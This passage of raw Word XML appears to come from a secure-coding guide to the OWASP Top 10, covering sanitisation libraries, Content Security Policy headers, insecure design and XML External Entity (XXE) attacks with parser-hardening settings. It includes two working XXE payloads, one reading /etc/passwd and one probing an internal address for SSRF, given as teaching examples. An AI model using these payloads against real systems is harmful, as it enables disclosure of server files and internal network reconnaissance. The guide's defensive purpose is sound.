        <w:t xml:space="preserve">Use a sanitisation library, not a custom regex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Language / Platform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Recommended Sanitisation Library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HTMLPurifier</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Java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Java HTML Sanitizer (owasp-java-html-sanitizer)</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HtmlSanitizer</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ASP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AntiXSS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Node.js / JavaScript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DOMPurify</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Content Security Policy (CSP) is a browser-enforced defence that restricts where scripts can be loaded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CSP and security header configuration</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Strict CSP — only allow scripts from same origin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Security-Policy: default-src 'self'</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Nonce-based CSP — allow specific inline scripts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Security-Policy: script-src 'nonce-randomStringVerySecure'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># In HTML:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script nonce="randomStringVerySecure"&gt;/* allowed script */&lt;/script&gt;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SRI for external scripts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Security-Policy: require-sri-for script;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script src="https://cdn.example.com/lib.js"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        integrity="sha384-oqV...wC"&gt;&lt;/script&gt;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Additional security headers</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Frame-Options: SAMEORIGIN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Content-Type-Options: nosniff</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">X-XSS-Protection: 1; mode=block</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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A03 Key Takeaways</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Always use prepared statements / parameterised queries — never concatenate user input into SQL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Suppress detailed database error messages in production</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Sanitise output with a proven library (DOMPurify, HTMLPurifier) — not custom regex</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Implement a Content Security Policy header to limit script execution</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Set X-Frame-Options, X-Content-Type-Options, and X-XSS-Protection headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A04:2021 — Insecure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 by system — potentially critical</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Insecure Design is a broad category representing design and architectural flaws, rather than implementation bugs. This is a new category in the 2021 edition, distinguishing between design failures (conceptual) and implementation failures (coding mistakes). A secure implementation of an insecure design is still vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Modelling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure design begins with threat modelling — systematically identifying potential attackers, their goals, attack vectors, and mitigations before writing code. Common frameworks include STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure Design Principles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Least Privilege: components and users should have the minimum permissions needed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence in Depth: layer multiple security controls so that compromising one doesn't break everything</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fail Securely: when something goes wrong, default to the more restrictive state</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Separation of Concerns: separate authentication, authorisation, business logic, and data access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero Trust: don't assume internal network traffic is inherently safe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: Insecure Business Logic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A password reset flow that sends a 4-digit numeric code via email has only 10,000 possible values. Without rate limiting, an attacker can brute-force all codes in under a minute. This is a design flaw, not a coding mistake — a 6+ character alphanumeric token with expiry and rate limiting should be designed in from the start.</w:t>
      </w:r>
    </w:p>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Integrate security into your design phase: create threat models before writing code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use established security design patterns and avoid reinventing security primitives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write security requirements alongside functional requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Design rate limiting, input validation, and access control as first-class concerns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct design review with security engineers before major feature releases</w:t>
      </w:r>
    </w:p>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A04 Key Takeaways</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Security problems in design cannot be patched away — they require redesign</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Conduct threat modelling during the design phase, not after development</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Apply least-privilege and fail-secure principles in system architecture</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Review business logic for assumptions attackers could violate (e.g. rate limits, workflow ordering)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Security is a design requirement, not an afterthought</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A05:2021 — Security Misconfiguration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Common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Exposure / RCE / Full System Compromise</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Security Misconfiguration is the most commonly found vulnerability. It includes misconfigured permissions, unnecessary features enabled, default credentials not changed, overly verbose error messages, and missing security hardening. This category also encompasses XML External Entity (XXE) injection, which was a separate OWASP category in 2017.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">XML External Entity (XXE) Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XML parsers may support external entity references by default. If an application parses XML input and the parser is not configured to disable external entities, an attacker can use XXE to read local files, perform SSRF, or trigger denial-of-service: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XXE attack payloads</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;!-- XXE payload: read /etc/passwd from the server --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;!DOCTYPE foo [</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">]&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;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&lt;!-- XXE for SSRF: probe internal network --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;!DOCTYPE foo [</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;!ENTITY xxe SYSTEM "http://192.168.1.1/admin"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">]&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;root&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/root&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Disabling XXE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Language / Library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Secure Configuration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Java (StAX)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xmlInputFactory.setProperty("javax.xml.stream.isSupportingExternalEntities", false);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XmlDocument xmlDoc = new XmlDocument(); xmlDoc.XmlResolver = null;</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PHP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libxml_disable_entity_loader(true);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 (Xerces)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parser-&gt;setCreateEntityReferenceNodes(false);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Other Common Misconfigurations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Misconfiguration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and Remedy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Verbose error messages in production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Reveal stack traces, DB schema, internal paths. Disable in production; log internally only.</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Default credentials not changed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panels with admin/admin or similar. Change all default credentials on deployment.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Unnecessary services/ports open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attack surface. Disable unused services; use firewall rules.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Directory listing enabled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Exposes file structure. Disable in web server configuration.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Missing security headers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clickjacking, MIME sniffing, XSS. Set X-Frame-Options, CSP, HSTS, etc.</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Overly permissive CORS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Allows cross-origin API calls from any domain. Whitelist specific origins only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Establish a hardening checklist for each technology in your stack (web server, app server, database, cloud)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable external XML entity processing in all XML parsers</w:t>
      </w:r>
    </w:p>
